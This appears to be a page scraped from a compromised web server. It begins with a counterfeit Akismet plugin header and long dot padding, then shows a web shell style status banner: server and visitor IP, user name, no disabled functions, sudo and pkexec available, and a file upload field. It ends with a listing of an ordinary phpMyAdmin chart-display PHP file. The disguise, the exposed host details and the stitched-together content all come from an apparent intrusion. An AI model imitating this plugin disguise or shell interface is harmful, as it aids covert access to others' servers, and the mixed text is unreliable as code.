#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/phpMyAdmin/libraries/ |
Upload File : |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
* functions for displaying chart
*
* @usedby tbl_chart.php
*
* @package PhpMyAdmin
*/
if (! defined('PHPMYADMIN')) {
exit;
}
/**
* Function to get html for pma_token and url_query
*
* @param string $url_query url query
*
* @return string
*/
function PMA_getHtmlForPmaTokenAndUrlQuery($url_query)
{
$htmlString = '<script type="text/javascript">'
. "pma_token = '" . $_SESSION[' PMA_token '] . "';"
. "url_query = '" . $url_query . "';"
. '</script>';
return $htmlString;
}
/**
* Function to get html for the chart type options
*
* @return string
*/
function PMA_getHtmlForChartTypeOptions()
{
$html = '<input type="radio" name="chartType" value="bar" id="radio_bar" />'
. '<label for ="radio_bar">' . _pgettext('Chart type', 'Bar') . '</label>'
. '<input type="radio" name="chartType" value="column" id="radio_column" />'
. '<label for ="radio_column">' . _pgettext('Chart type', 'Column')
. '</label>'
. '<input type="radio" name="chartType" value="line" id="radio_line"'
. ' checked="checked" />'
. '<label for ="radio_line">' . _pgettext('Chart type', 'Line') . '</label>'
. '<input type="radio" name="chartType" value="spline" id="radio_spline" />'
. '<label for ="radio_spline">' . _pgettext('Chart type', 'Spline')
. '</label>'
. '<input type="radio" name="chartType" value="area" id="radio_area" />'
. '<label for ="radio_area">' . _pgettext('Chart type', 'Area') . '</label>'
. '<span class="span_pie" style="display:none;">'
. '<input type="radio" name="chartType" value="pie" id="radio_pie" />'
. '<label for ="radio_pie">' . _pgettext('Chart type', 'Pie') . '</label>'
. '</span>'
. '<span class="span_timeline" style="display:none;">'
. '<input type="radio" name="chartType" '
. 'value="timeline" id="radio_timeline" />'
. '<label for ="radio_timeline">' . _pgettext('Chart type', 'Timeline')
. '</label>'
. '</span>'
. '<span class="span_scatter" style="display:none;">'
. '<input type="radio" name="chartType" '
. 'value="scatter" id="radio_scatter" />'
. '<label for ="radio_scatter">' . _pgettext('Chart type', 'Scatter')
. '</label>'
. '</span>'
. '<br /><br />';
return $html;
}
/**
* Function to get html for the bar stacked option
*
* @return string
*/
function PMA_getHtmlForStackedOption()
{
$html = '<span class="barStacked" style="display:none;">'
. '<input type="checkbox" name="barStacked" value="1"'
. ' id="checkbox_barStacked" />'
. '<label for ="checkbox_barStacked">' . __('Stacked') . '</label>'
. '</span>'
. '<br /><br />';
return $html;
}
/**
* Function to get html for the chart x axis options
*
* @param array $keys keys
* @param int &$xaxis x axis
*
* @return string
*/
function PMA_getHtmlForChartXAxisOptions($keys, &$xaxis)
{
$htmlString = '<div style="float:left; padding-left:40px;">'
. '<label for="select_chartXAxis">' . __('X-Axis:') . '</label>'
. '<select name="chartXAxis" id="select_chartXAxis">';
foreach ($keys as $idx => $key) {
if ($xaxis === null) {
$htmlString .= '<option value="' . htmlspecialchars($idx)
. '" selected="selected">' . htmlspecialchars($key) . '</option>';
$xaxis = $idx;
} else {
$htmlString .= '<option value="' . htmlspecialchars($idx) . '">'
. htmlspecialchars($key) . '</option>';
}
}
$htmlString .= '</select>';
return $htmlString;
}
/**
* Function to get html for chart series options
*
* @param array $keys keys
* @param array $fields_meta fields meta
* @param array $numeric_types numeric types
* @param int $xaxis x axis
* @param int $numeric_column_count numeric column count
*
* @return string
*/
function PMA_getHtmlForChartSeriesOptions($keys, $fields_meta, $numeric_types,
$xaxis, $numeric_column_count
) {
$htmlString = '<br />'
. '<label for="select_chartSeries">' . __('Series:') . '</label>'
. '<select name="chartSeries" id="select_chartSeries" multiple="multiple">';
foreach ($keys as $idx => $key) {
if (in_array($fields_meta[$idx]->type, $numeric_types)) {
if ($idx == $xaxis && $numeric_column_count > 1) {
$htmlString .= '<option value="' . htmlspecialchars($idx) . '">'
. htmlspecialchars($key) . '</option>';
} else {
$htmlString .= '<option value="' . htmlspecialchars($idx)
. '" selected="selected">' . htmlspecialchars($key)
. '</option>';
}
}
}
$htmlString .= '</select>';
return $htmlString;
}
/**
* Function to get html for date time columns
*
* @param array $keys keys
* @param array $fields_meta fields meta
*
* @return string
*/
function PMA_getHtmlForDateTimeCols($keys, $fields_meta)
{
$htmlString = '<input type="hidden" name="dateTimeCols" value="';
$date_time_types = array('date', 'datetime', 'timestamp');
foreach ($keys as $idx => $key) {
if (in_array($fields_meta[$idx]->type, $date_time_types)) {
$htmlString .= $idx . " ";
}
}
$htmlString .= '" />';
return $htmlString;
}
/**
* Function to get html for date time columns
*
* @param array $keys keys
* @param array $fields_meta fields meta
* @param array $numeric_types numeric types
*
* @return string
*/
function PMA_getHtmlForNumericCols($keys, $fields_meta, $numeric_types)
{
$htmlString = '<input type="hidden" name="numericCols" value="';
foreach ($keys as $idx => $key) {
if (in_array($fields_meta[$idx]->type, $numeric_types)) {
$htmlString .= $idx . " ";
}
}
$htmlString .= '" />';
return $htmlString;
}
/**
* Function to get html for the table axis label options
*
* @param int $xaxis x axis
* @param array $keys keys
*
* @return string
*/
function PMA_getHtmlForTableAxisLabelOptions($xaxis, $keys)
{
$htmlString = '<div style="float:left; padding-left:40px;">'
. '<label for="xaxis_label">' . __('X-Axis label:') . '</label>'
. '<input style="margin-top:0;" type="text" name="xaxis_label" id="xaxis_label"'
. ' value="'
. (($xaxis == -1) ? __('X Values') : htmlspecialchars($keys[$xaxis]))
. '" /><br />'
. '<label for="yaxis_label">' . __('Y-Axis label:') . '</label>'
. '<input type="text" name="yaxis_label" id="yaxis_label" value="'
. __('Y Values') . '" /><br />'
. '</div>';
return $htmlString;
}
/**
* Function to get html for switching to alternative data format
*
* @param array $keys keys
* @param array $fields_meta fields meta
* @param array $numeric_types numeric types
* @param int $xaxis x axis
*
* @return string
*/
function PMA_getHtmlForAlternativeDataFormat($keys, $fields_meta, $numeric_types,
$xaxis
) {
$htmlString = '<p style="clear:both;"> </p>'
. '<div><input type="checkbox" id="chkAlternative" '
. 'name="chkAlternative" value="alternativeFormat">'
. __('Series names are in a column') . '</input>';
$htmlString .= '<br />'
. '<label for="select_seriesColumn">' . __('Series column:') . '</label>'
. '<select name="chartSeriesColumn" id="select_seriesColumn" disabled>';
foreach ($keys as $idx => $key) {
$htmlString .= '<option value="' . htmlspecialchars($idx) . '"';
if ($idx == 1) {
$htmlString .= ' selected="selected"';
$seriesColumn = $idx;
}
$htmlString .= '>' . htmlspecialchars($key) . '</option>';
}
$htmlString .= '</select>';
$htmlString .= '<label for="select_valueColumn">'
. __('Value column:') . '</label>'
. '<select name="chartValueColumn" id="select_valueColumn" disabled>';
$selected = false;
foreach ($keys as $idx => $key) {
if (in_array($fields_meta[$idx]->type, $numeric_types)) {
if (! $selected && $idx != $xaxis && $idx != $seriesColumn) {
$htmlString .= '<option value="' . htmlspecialchars($idx)
. '" selected="selected">' . htmlspecialchars($key)
. '</option>';
$selected = true;
} else {
$htmlString .= '<option value="' . htmlspecialchars($idx) . '">'
. htmlspecialchars($key) . '</option>';
}
}
}
$htmlString .= '</select></div>';
return $htmlString;
}
/**
* Function to get html for the start row and number of rows options
*
* @param string $sql_query sql query
*
* @return string
*/
function PMA_getHtmlForStartAndNumberOfRowsOptions($sql_query)
{
$htmlString = '<p style="clear:both;"> </p>'
. '<fieldset>'
. '<div>'
. '<label for="pos">' . __('Start row:') . '</label>'
. '<input type="text" name="pos" size="3" value="'
. $_SESSION['tmpval']['pos'] . '" />'
. '<label for="session_max_rows">'
. __('Number of rows:') . '</label>'
. '<input type="text" name="session_max_rows" size="3" value="'
. (($_SESSION['tmpval']['max_rows'] != 'all')
? $_SESSION['tmpval']['max_rows']
: $GLOBALS['cfg']['MaxRows'])
. '" />'
. '<input type="submit" name="submit" class="Go" value="' . __('Go')
. '" />'
. '<input type="hidden" name="sql_query" value="'
. htmlspecialchars($sql_query) . '" />'
. '</div>'
. '</fieldset>';
return $htmlString;
}
/**
* Function to get html for the chart area div
*
* @return string
*/
function PMA_getHtmlForChartAreaDiv()
{
$htmlString = '<p style="clear:both;"> </p>'
. '<div id="resizer" style="width:600px; height:400px;">'
. '<div style="position: absolute; right: 10px;'
. ' top: 10px; cursor: pointer; z-index: 1000;">'
. '<a class="disableAjax" id="saveChart" href="#" download="chart.png">'
. PMA_Util::getImage('b_saveimage', __('Save chart as image'))
. '</a>'
. '</div>'
. '<div id="querychart">'
. '</div>'
. '</div>';
return $htmlString;
}
/**
* Function to get html for displaying table chart
*
* @param string $url_query url query
* @param array $url_params url parameters
* @param array $keys keys
* @param array $fields_meta fields meta
* @param array $numeric_types numeric types
* @param int $numeric_column_count numeric column count
* @param string $sql_query sql query
*
* @return string
*/
function PMA_getHtmlForTableChartDisplay($url_query, $url_params, $keys,
$fields_meta, $numeric_types, $numeric_column_count, $sql_query
) {
// pma_token/url_query needed for chart export
$htmlString = PMA_getHtmlForPmaTokenAndUrlQuery($url_query);
$htmlString .= '<!-- Display Chart options -->'
. '<div id="div_view_options">'
. '<form method="post" id="tblchartform" action="tbl_chart.php" '
. 'class="ajax">'
. PMA_URL_getHiddenInputs($url_params)
. '<fieldset>'
. '<legend>' . __('Display chart') . '</legend>'
. '<div style="float:left; width:420px;">';
$htmlString .= PMA_getHtmlForChartTypeOptions();
$htmlString .= PMA_getHtmlForStackedOption();
$htmlString .= '<input type="text" name="chartTitle" value="'
. __('Chart title')
. '">'
. '</div>';
$xaxis = null;
$htmlString .= PMA_getHtmlForChartXAxisOptions($keys, $xaxis);
$htmlString .= PMA_getHtmlForChartSeriesOptions(
$keys, $fields_meta, $numeric_types, $xaxis, $numeric_column_count
);
$htmlString .= PMA_getHtmlForDateTimeCols($keys, $fields_meta);
$htmlString .= PMA_getHtmlForNumericCols($keys, $fields_meta, $numeric_types);
$htmlString .= '</div>';
$htmlString .= PMA_getHtmlForTableAxisLabelOptions($xaxis, $keys);
$htmlString .= PMA_getHtmlForAlternativeDataFormat(
$keys, $fields_meta, $numeric_types, $xaxis
);
$htmlString .= PMA_getHtmlForStartAndNumberOfRowsOptions($sql_query);
$htmlString .= PMA_getHtmlForChartAreaDiv();
$htmlString .= '</fieldset>'
. '</form>'
. '</div>';
return $htmlString;
}
?>